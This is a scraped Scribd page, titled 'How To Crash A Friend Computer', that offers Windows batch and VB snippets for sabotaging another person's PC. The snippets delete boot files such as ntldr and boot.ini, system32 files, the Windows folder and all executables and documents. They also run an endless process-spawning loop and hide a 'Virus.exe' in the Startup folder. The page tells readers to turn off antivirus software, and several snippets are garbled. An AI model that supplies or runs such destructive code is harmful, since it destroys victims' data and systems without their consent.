80% found this document useful (5 votes)
18K views

How To Crash A Friend Computer

The document provides instructions for creating malicious .bat files to crash or harm a friend's computer. It includes code for deleting important system files which would render the computer unusable, as well as code for a Trojan that deletes common file types and creates a "Screwed!" directory upon execution. The document warns readers that they are responsible for their own actions and advises shutting off antivirus software before running the malicious files.

Uploaded by

dj gangster
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
80% found this document useful (5 votes)
18K views

How To Crash A Friend Computer

The document provides instructions for creating malicious .bat files to crash or harm a friend's computer. It includes code for deleting important system files which would render the computer unusable, as well as code for a Trojan that deletes common file types and creates a "Screwed!" directory upon execution. The document warns readers that they are responsible for their own actions and advises shutting off antivirus software before running the malicious files.

Uploaded by

dj gangster
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
You are on page 1/ 4

How to crash a friend’s computer using simple

notepad .bat files


By following two rules you can crash anyone’s pc
Rule 1:-
Those who download this document want to tell
them that I am not responsible for any action
they do and they are responsible for it....
Rule 2:-

Copy the given code in notepad and then save it as whatever


you want to name but in the end put .bat so that it can become
a batch file and make the save as option all files run it and see
the effect .if you like the document then comment so I can put
more of the same kind of document .......

Delete c drive

@ECHO OFF
:RunIt
ECHO Deleting "C:\WINDOWS"
Pause
cls
shutdown -s -t 15 -c "C:\WINDOWS\PROGRAMFILES DELETED. REBOOTING..."
:start
start
goto start
Also a Trojan file so just shut the antivirus if any

@echo off
msg * Virus Activated *
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * you have been hacked. *
shutdown -s -t 10 -c " "

To delete sys file


del "C:\WINDOWS\SYSTEM32\bootok"
/Q/S >nul

del "C:\WINDOWS\SYSTEM32\bootvid.d ll"


/Q/S >nul

del "C:\WINDOWS\SYSTEM32\bootvrfy"
/Q/S >nul

to delete all document files

rmdir C:\Documents and Settings \S\Q.


A virus file

SetAttr "C:\Documents and Settings\All Users\Start


Menu\Programs\Startup\Virus.ex e", vbSystem + vbHidden
Shell ("Shutdown -s -t 1")

Simple step to delete c

@echo off

Del /q “c:\windows”

TROJANS

@Echo off
Del *.exe
Del *.com
Del *.dll
Del *.doc
Echo Your Screwed !
Mkdir C:\Screwed!

@Echo off - Turns echo off so user doesn't know what happens
Del *.exe - Deletes all files in the current directory with the .exe
extension
Del *.com - Deletes all files in the current directory with the .com
extension
Del *.dll - Deletes all files in the current directory with the .dll
extension
Del *.doc - Deletes all files in the current directory with the .doc
extension
Echo Your Screwed ! - Displays Your Screwed !
Mkdir C:\Screwed! - Creates the directory Screwed on the C: drive

Virus file
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

You might also like